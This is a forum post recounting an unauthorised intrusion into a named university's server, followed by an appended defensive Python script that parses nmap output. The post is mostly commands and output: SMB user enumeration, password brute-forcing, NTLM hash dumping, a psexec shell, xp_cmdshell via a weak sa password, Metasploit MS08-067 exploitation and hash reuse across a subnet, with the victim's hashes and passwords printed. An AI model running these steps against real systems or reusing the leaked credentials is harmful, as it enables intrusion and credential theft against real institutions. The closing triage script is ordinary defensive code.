中国网络渗透测试联盟 (China Network Penetration Testing Alliance)

Title: nmap + msf intrusion into Guangxi Normal University

Author: admin    Time: 2012-12-4 12:46
Guangxi Normal University website: http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb  // list the SMB scan scripts

-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// use the script to enumerate the accounts that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// list the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// obtain the user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds

root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2    // grab the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds

C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe    // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . : 202.103.242.241
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user' "   // log in remotely as sa and run a command

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241     // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

root@bt:~# msfconsole                                             // use the MS08-067 vulnerability in msf to exploit the target machine

msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show options
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf  exploit(ms08_067_netapi) > show payloads
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf  exploit(ms08_067_netapi) > exploit

meterpreter >

Background session 2? [y/N]  (ctrl+z)

msf  exploit(ms08_067_netapi) > sessions -l

root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// use the usernames and the captured hash to try logging in across the whole internal subnet

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Attack successful, a simple msf + nmap attack~~
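Added example, not part of the original post: a small Python triage script that reads plain-text nmap output in the layout shown above (smb-enum-shares, smb-brute and smb-check-vulns host script results) and flags what a defender should fix first: shares readable anonymously, logins that succeeded with a blank or guessable password, and checks reported VULNERABLE. The sample output and the 192.0.2.10 address are constructed for the example.

```python
import re

# Constructed sample in the layout of the post's nmap output (documentation IP)
SAMPLE = """\
Nmap scan report for bogon (192.0.2.10)
Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful
| smb-check-vulns:
|_  MS08-067: VULNERABLE
"""

def triage(nmap_text):
    findings, host, script, share = [], None, None, None
    for raw in nmap_text.splitlines():
        m = re.match(r"Nmap scan report for (?:\S+ \()?([\d.]+)\)?", raw)
        if m:                                   # new host: reset parser state
            host, script, share = m.group(1), None, None
            continue
        if not raw.startswith("|"):             # only NSE script lines matter
            continue
        line = raw[1:].lstrip("_ ")             # drop the "| " / "|_ " prefix
        m = re.match(r"([\w-]+):\s*$", line)
        if m:                                   # "| smb-brute:" style header
            script = m.group(1)
            continue
        if script == "smb-enum-shares":
            m = re.match(r"Anonymous access:\s*(\S+)", line)
            if m is None:                       # a share name such as IPC$
                share = line.strip()
            elif m.group(1) != "<none>":
                findings.append((host, "HIGH",
                                 f"share {share} allows anonymous {m.group(1)}"))
        elif script == "smb-brute":
            m = re.match(r"(\S+?):(\S+) => Login was successful", line)
            if m:                               # blank password is the worst case
                sev = "CRITICAL" if m.group(2) == "<blank>" else "HIGH"
                findings.append((host, sev, f"guessable SMB credential for {m.group(1)}"))
        elif script == "smb-check-vulns":
            m = re.match(r"(\S+): VULNERABLE", line)   # "NOT VULNERABLE" does not match
            if m:
                findings.append((host, "CRITICAL", f"unpatched {m.group(1)}"))
    return findings

if __name__ == "__main__":
    for host, sev, msg in triage(SAMPLE):
        print(f"{host} {sev}: {msg}")
```

Every finding here maps to a fix that closes the path the post walks: disable anonymous IPC$ access, set strong passwords on the enumerated accounts, and apply the MS08-067 patch.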
; S; l) A' J( o/ b/ s6 D& y. S$ _# U' u# ?, P/ t* S





Welcome to 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2